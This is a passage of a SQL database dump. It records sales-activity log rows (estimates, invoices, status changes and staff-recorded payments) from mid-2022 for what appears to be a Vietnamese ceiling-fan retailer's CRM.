(530, 'invoice', 76, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:16:\"75.000.000,70 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/85\" target=\"_blank\">#85</a>\";}', '1', 'Ho Gia Phat', '2022-05-08 09:43:44'),
(531, 'invoice', 98, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-05-10 09:45:05'),
(532, 'invoice', 98, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-05-10 10:03:47'),
(533, 'invoice', 98, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.180.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/86\" target=\"_blank\">#86</a>\";}', '1', 'Ho Gia Phat', '2022-05-10 10:03:47'),
(534, 'estimate', 57, 'estimate_activity_created', '', '2', 'Cong Ho', '2022-05-11 10:12:40'),
(535, 'estimate', 57, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:133:\"Sải cánh: 231 cm <br />\r\nCông suất động cơ: tiêu chuẩn BLDC, 100W <br />\r\nMàu sắc: Sliver Aluminium <br />\r\n <br />\r\n\";i:1;s:103:\"Sải cánh: 231 cm \r\nCông suất động cơ: tiêu chuẩn BLDC, 100W \r\nMàu sắc: Sliver Aluminium\";}', '2', 'Cong Ho', '2022-05-11 10:13:11'),
(536, 'estimate', 57, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:64:\"Quạt trần cánh lớn NEVIS màu Vân Gỗ Alumium 93YFT7046\";}', '2', 'Cong Ho', '2022-05-12 08:37:08'),
(537, 'estimate', 57, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:46:\"Nhân công lắp đặt - quạt trần Nevis\";}', '2', 'Cong Ho', '2022-05-12 08:37:08'),
(538, 'invoice', 99, 'invoice_activity_created', '', '2', 'Cong Ho', '2022-05-12 08:43:04'),
(539, 'estimate', 57, 'estimate_activity_converted', 'a:1:{i:0;s:75:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/99\">INV-DRAFT</a>\";}', '2', 'Cong Ho', '2022-05-12 08:43:04'),
(540, 'estimate', 58, 'estimate_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-05-13 15:19:45'),
(541, 'invoice', 100, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-05-13 15:19:50'),
(542, 'estimate', 58, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/100\">INV-94-22</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-05-13 15:19:50'),
(543, 'invoice', 101, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-05-15 10:03:10'),
(544, 'invoice', 101, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:228:\"Sải cánh 152cm<br />\r\nĐộng cơ DC, BLDC công suất 38W<br />\r\nChất liệu cánh: Gỗ tự nhiên (Màu Darl Walnut)<br />\r\nMàu sắc thân quạt: Black<br />\r\nĐiều khiển từ xa 5 cấp đi kèm<br />\r\n<br />\r\n\";i:1;s:188:\"Sải cánh 152cm\r\nĐộng cơ DC, BLDC công suất 38W\r\nChất liệu cánh: Gỗ tự nhiên (Màu Darl Walnut)\r\nMàu sắc thân quạt: Black\r\nĐiều khiển từ xa 5 cấp đi kèm\";}', '1', 'Ho Gia Phat', '2022-05-15 10:10:31'),
(545, 'invoice', 91, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"8.000.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/87\" target=\"_blank\">#87</a>\";}', '1', 'Ho Gia Phat', '2022-05-15 17:49:53'),
(546, 'invoice', 91, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-05-15 17:51:37'),
(547, 'invoice', 91, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"11.600.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/88\" target=\"_blank\">#88</a>\";}', '1', 'Ho Gia Phat', '2022-05-15 17:51:37'),
(548, 'invoice', 100, 'invoice_activity_marked_as_cancelled', '', '6', 'Mỹ Anh Nguyễn', '2022-05-16 08:21:37'),
(549, 'invoice', 88, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-05-16 08:22:42'),
(550, 'invoice', 88, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"500.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/89\" target=\"_blank\">#89</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-05-16 08:22:42'),
(551, 'invoice', 102, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-05-16 11:44:23'),
(552, 'invoice', 84, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-05-17 12:52:24'),
(553, 'invoice', 84, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"8.720.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/90\" target=\"_blank\">#90</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-05-17 12:52:24'),
(554, 'estimate', 59, 'estimate_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-05-18 08:53:58'),
(555, 'invoice', 103, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-05-18 08:54:39'),
(556, 'estimate', 59, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/103\">INV-96-22</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-05-18 08:54:39'),
(557, 'estimate', 60, 'estimate_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-05-20 14:24:22'),
(558, 'invoice', 104, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-05-20 14:24:33'),
(559, 'estimate', 60, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/104\">INV-97-22</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-05-20 14:24:33'),
(560, 'invoice', 104, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-05-21 10:35:08'),
(561, 'invoice', 104, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"500.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/91\" target=\"_blank\">#91</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-05-21 10:35:08'),
(562, 'invoice', 103, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-05-21 10:40:58'),
(563, 'invoice', 103, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"1.400.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/92\" target=\"_blank\">#92</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-05-21 10:40:58'),
(564, 'invoice', 58, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:53:\"Quạt trần cánh lớn Powerful S1 sải cánh 2m5\";}', '1', 'Ho Gia Phat', '2022-05-21 16:20:58'),
(565, 'invoice', 58, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:41:\"Quạt trần cao cấp IRIS 60 White ABS\";i:1;s:4:\"5.00\";i:2;s:1:\"3\";}', '1', 'Ho Gia Phat', '2022-05-21 16:20:58'),
(566, 'invoice', 102, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-05-27 16:14:34'),
(567, 'invoice', 102, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.320.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/93\" target=\"_blank\">#93</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-05-27 16:14:34'),
(568, 'estimate', 61, 'estimate_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-05-30 10:33:04'),
(569, 'invoice', 105, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-05-30 10:33:10'),
(570, 'estimate', 61, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/105\">INV-98-22</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-05-30 10:33:10'),
(571, 'invoice', 105, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-05-30 11:44:55'),
(572, 'invoice', 105, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"2.250.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/94\" target=\"_blank\">#94</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-05-30 11:44:55'),
(573, 'estimate', 62, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-06-01 09:50:59'),
(574, 'invoice', 106, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-06-01 09:52:07'),
(575, 'estimate', 62, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/106\">INV-DRAFT</a>\";}', '1', 'Ho Gia Phat', '2022-06-01 09:52:07');
INSERT INTO `tblsales_activity` (`id`, `rel_type`, `rel_id`, `description`, `additional_data`, `staffid`, `full_name`, `date`) VALUES
(576, 'estimate', 62, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:509:\"Sải cánh: 152cm <br />\r\nĐộng cơ EC motor, công suất max/min : 2.5/29,3Watts<br />\r\nChất liệu màu cánh: Tre 5 lớp (Caramel Bamboo)<br />\r\nChất liệu màu thân quạt: Đen (Matt Black) - Aluminium<br />\r\nĐiều khiển APP, remote từ xa<br />\r\nTích hợp sẳn cảm biến SenseMe, cảm biến nhiệt/ độ ẩm, cảm biến chuyển động hồng ngoại<br />\r\nBảo hành: 3 năm <br />\r\nThương hiệu/xuất xứ: Big Ass Fans /USA<br />\r\nBộ cánh sản xuất tại USA\";i:1;s:536:\"Sải cánh: 152cm \r\nĐộng cơ EC motor, công suất max/min : 2.5/29,3Watts\r\nChất liệu màu cánh: Tre 5 lớp (Caramel Bamboo)\r\nChất liệu màu thân quạt: Đen (Matt Black) - Aluminium\r\nĐiều khiển APP, remote từ xa\r\nTích hợp sẳn cảm biến SenseMe, cảm biến nhiệt/ độ ẩm, cảm biến chuyển động hồng ngoại\r\nChức năng: Sleep, Timer, Whoosh, and Fan Eco special operational modes\r\nBảo hành: 3 năm \r\nThương hiệu/xuất xứ: Big Ass Fans /USA\r\nBộ cánh sản xuất tại USA\";}', '1', 'Ho Gia Phat', '2022-06-01 20:57:32'),
(577, 'estimate', 62, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:34:\"Bộ đèn LED quạt trần Haiku\";}', '1', 'Ho Gia Phat', '2022-06-01 20:59:49'),
(578, 'invoice', 106, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:34:\"Bộ đèn LED quạt trần Haiku\";}', '1', 'Ho Gia Phat', '2022-06-01 21:02:16'),
(579, 'invoice', 106, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:26:\"Bộ đèn LED thay thế:\";i:1;s:127:\"Đèn LED viền trắng theo quạt \r\nCông suất: 16.3 W\r\nNominal Lumen Output: 1280 Lm\r\nDimming Range: 3-100% (16 settings)\";}', '1', 'Ho Gia Phat', '2022-06-01 21:04:50'),
(580, 'invoice', 106, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2022-06-01 21:06:34'),
(581, 'invoice', 106, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"14.070.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/95\" target=\"_blank\">#95</a>\";}', '1', 'Ho Gia Phat', '2022-06-01 21:06:34'),
(582, 'estimate', 63, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-06-04 12:25:03'),
(583, 'estimate', 63, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:48:\"Bảo dưỡng, sửa chữa lắp đặt quạt\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-04 13:27:17'),
(584, 'estimate', 63, 'invoice_estimate_activity_removed_item', 'a:1:{i:0;s:50:\"Bộ điều khiển DC 6 tốc độ Tổ chức đào tạo WIT\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-04 13:27:17'),
(585, 'invoice', 107, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-06-04 13:27:28'),
(586, 'estimate', 63, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/107\">INV-100-22</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-04 13:27:29'),
(587, 'estimate', 64, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-06-05 11:58:10'),
(588, 'estimate', 64, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '1', 'Ho Gia Phat', '2022-06-05 11:58:41'),
(589, 'invoice', 108, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-06-05 12:00:08'),
(590, 'estimate', 64, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/108\">INV-101-22</a>\";}', '1', 'Ho Gia Phat', '2022-06-05 12:00:08'),
(591, 'invoice', 108, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '1', 'Ho Gia Phat', '2022-06-05 12:00:55'),
(592, 'invoice', 108, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"3.000.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/96\" target=\"_blank\">#96</a>\";}', '1', 'Ho Gia Phat', '2022-06-05 12:00:55'),
(593, 'invoice', 107, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-06 09:16:13'),
(594, 'invoice', 107, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"150.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/97\" target=\"_blank\">#97</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-06 09:16:13'),
(595, 'invoice', 95, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:41:\"Quạt trần thấp AROMA 52 Dark Walnut\";i:1;s:4:\"1.00\";i:2;s:1:\"2\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-07 16:34:13'),
(596, 'invoice', 95, 'invoice_estimate_activity_updated_qty_item', 'a:3:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";i:1;s:4:\"1.00\";i:2;s:1:\"2\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-07 16:34:13'),
(597, 'estimate', 65, 'estimate_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-06-08 09:22:55'),
(598, 'invoice', 109, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-06-08 09:23:23'),
(599, 'estimate', 65, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/109\">INV-102-22</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-08 09:23:23'),
(600, 'estimate', 66, 'estimate_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-06-09 15:04:30'),
(601, 'estimate', 67, 'estimate_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-06-10 09:04:58'),
(602, 'invoice', 110, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-06-10 09:52:47'),
(603, 'estimate', 67, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/110\">INV-103-22</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-10 09:52:47'),
(604, 'estimate', 66, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>3</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-11 08:57:46'),
(605, 'invoice', 95, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"5.578.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/98\" target=\"_blank\">#98</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-11 10:27:06'),
(606, 'estimate', 68, 'estimate_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-06-11 14:06:16'),
(607, 'invoice', 89, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-13 11:21:39'),
(608, 'invoice', 89, 'invoice_activity_marked_as_sent', 'a:0:{}', '6', 'Mỹ Anh Nguyễn', '2022-06-13 11:21:39'),
(609, 'invoice', 89, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-13 11:22:22'),
(610, 'invoice', 109, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-13 11:30:25'),
(611, 'invoice', 109, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"150.000 đ\";i:1;s:79:\"<a href=\"https://hgphome.com/admin/payments/payment/99\" target=\"_blank\">#99</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-13 11:30:25'),
(612, 'invoice', 95, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:9:\"22.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/100\" target=\"_blank\">#100</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-14 08:25:22'),
(613, 'estimate', 68, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:61:\"Bộ điều khiển 3 tốc độ. Dùng cho động cơ AC \";i:1;s:60:\"Bộ điều khiển 3 tốc độ. Dùng cho động cơ AC\";}', '1', 'Ho Gia Phat', '2022-06-14 10:08:50'),
(614, 'invoice', 74, 'invoice_estimate_activity_added_item', 'a:1:{i:0;s:70:\"Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-14 17:21:17'),
(615, 'estimate', 68, 'not_estimate_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-15 15:24:30'),
(616, 'invoice', 111, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-06-15 15:24:34'),
(617, 'estimate', 68, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/111\">INV-105-22</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-15 15:24:34'),
(618, 'invoice', 106, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:8:\"32,83 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/101\" target=\"_blank\">#101</a>\";}', '1', 'Ho Gia Phat', '2022-06-16 11:49:15'),
(619, 'invoice', 89, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-16 13:56:50'),
(620, 'invoice', 89, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"7.040.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/102\" target=\"_blank\">#102</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-16 13:56:50'),
(621, 'invoice', 112, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-06-17 10:32:37'),
(622, 'estimate', 69, 'estimate_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-06-17 11:49:44'),
(623, 'invoice', 113, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-06-17 11:49:54'),
(624, 'estimate', 69, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/113\">INV-107-22</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-17 11:49:54'),
(625, 'invoice', 113, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-17 11:50:11'),
(626, 'invoice', 113, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:10:\"300.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/103\" target=\"_blank\">#103</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-17 11:50:11'),
(627, 'invoice', 99, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>4</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-17 11:51:37'),
(628, 'invoice', 99, 'invoice_activity_marked_as_sent', 'a:0:{}', '6', 'Mỹ Anh Nguyễn', '2022-06-17 11:51:37'),
(629, 'invoice', 99, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>4</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-17 11:51:50'),
(630, 'invoice', 106, 'invoice_activity_payment_deleted', 'a:2:{i:0;s:3:\"101\";i:1;s:8:\"32,83 đ\";}', '1', 'Ho Gia Phat', '2022-06-18 15:25:48'),
(631, 'invoice', 106, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-06-18 15:26:29'),
(632, 'invoice', 106, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"32.830.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/104\" target=\"_blank\">#104</a>\";}', '1', 'Ho Gia Phat', '2022-06-18 15:26:29'),
(633, 'invoice', 74, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>3</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-06-18 15:31:26'),
(634, 'invoice', 74, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"3.696.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/105\" target=\"_blank\">#105</a>\";}', '1', 'Ho Gia Phat', '2022-06-18 15:31:26'),
(635, 'invoice', 67, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2022-06-18 15:33:24'),
(636, 'invoice', 87, 'invoice_activity_marked_as_cancelled', '', '1', 'Ho Gia Phat', '2022-06-18 15:33:32'),
(637, 'invoice', 99, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-06-18 15:38:38'),
(638, 'invoice', 99, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"19.500.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/106\" target=\"_blank\">#106</a>\";}', '1', 'Ho Gia Phat', '2022-06-18 15:38:38'),
(639, 'estimate', 70, 'estimate_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-06-18 16:19:13'),
(640, 'invoice', 114, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-06-18 16:20:06'),
(641, 'estimate', 70, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/114\">INV-111-22</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-18 16:20:06'),
(642, 'invoice', 114, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-06-18 17:07:29'),
(643, 'invoice', 114, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.875.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/107\" target=\"_blank\">#107</a>\";}', '1', 'Ho Gia Phat', '2022-06-18 17:07:29'),
(644, 'invoice', 115, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-06-22 11:20:47'),
(645, 'estimate', 71, 'estimate_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-06-24 13:55:29'),
(646, 'invoice', 116, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-06-24 14:07:21'),
(647, 'estimate', 71, 'estimate_activity_converted', 'a:1:{i:0;s:77:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/116\">INV-113-22</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-24 14:07:21'),
(648, 'estimate', 72, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-06-25 09:39:21'),
(649, 'invoice', 116, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '1', 'Ho Gia Phat', '2022-06-25 09:43:07'),
(650, 'invoice', 116, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:13:\"10.050.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/108\" target=\"_blank\">#108</a>\";}', '1', 'Ho Gia Phat', '2022-06-25 09:43:07'),
(651, 'estimate', 73, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-06-25 10:00:16'),
(652, 'invoice', 117, 'invoice_activity_created', '', '1', 'Ho Gia Phat', '2022-06-25 10:00:33'),
(653, 'estimate', 73, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/117\">INV-DRAFT</a>\";}', '1', 'Ho Gia Phat', '2022-06-25 10:00:33'),
(654, 'estimate', 74, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-06-25 11:31:16'),
(655, 'invoice', 115, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>1</original_status>\";i:1;s:26:\"<new_status>2</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-25 15:46:22'),
(656, 'invoice', 115, 'invoice_activity_payment_made_by_staff', 'a:2:{i:0;s:12:\"4.925.000 đ\";i:1;s:81:\"<a href=\"https://hgphome.com/admin/payments/payment/109\" target=\"_blank\">#109</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-25 15:46:22'),
(657, 'estimate', 75, 'estimate_activity_created', '', '1', 'Ho Gia Phat', '2022-06-25 15:55:02'),
(658, 'estimate', 75, 'invoice_estimate_activity_updated_item_long_description', 'a:2:{i:0;s:0:\"\";i:1;s:144:\"Sải cánh 1320mm \r\nĐộng cơ DC, 35W\r\nMàu sắc: Trắng\r\nĐèn LED : ánh sáng ấm 2700K\r\nBộ điều khiển tặng kèm 6 tốc độ\";}', '1', 'Ho Gia Phat', '2022-06-25 15:56:06'),
(659, 'estimate', 76, 'estimate_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-06-25 16:47:58'),
(660, 'estimate', 76, 'invoice_estimate_activity_updated_item_rate', 'a:2:{i:0;s:10:\"6600000.00\";i:1;s:10:\"6300000.00\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-25 16:48:52'),
(661, 'invoice', 118, 'invoice_activity_created', '', '6', 'Mỹ Anh Nguyễn', '2022-06-25 16:49:31'),
(662, 'estimate', 76, 'estimate_activity_converted', 'a:1:{i:0;s:76:\"<a href=\"https://hgphome.com/admin/invoices/list_invoices/118\">INV-DRAFT</a>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-25 16:49:31'),
(663, 'invoice', 118, 'invoice_activity_status_updated', 'a:2:{i:0;s:36:\"<original_status>6</original_status>\";i:1;s:26:\"<new_status>1</new_status>\";}', '6', 'Mỹ Anh Nguyễn', '2022-06-25 16:55:04'),
(664, 'invoice', 118, 'invoice_activity_marked_as_sent', 'a:0:{}', '6', 'Mỹ Anh Nguyễn', '2022-06-25 16:55:04'),
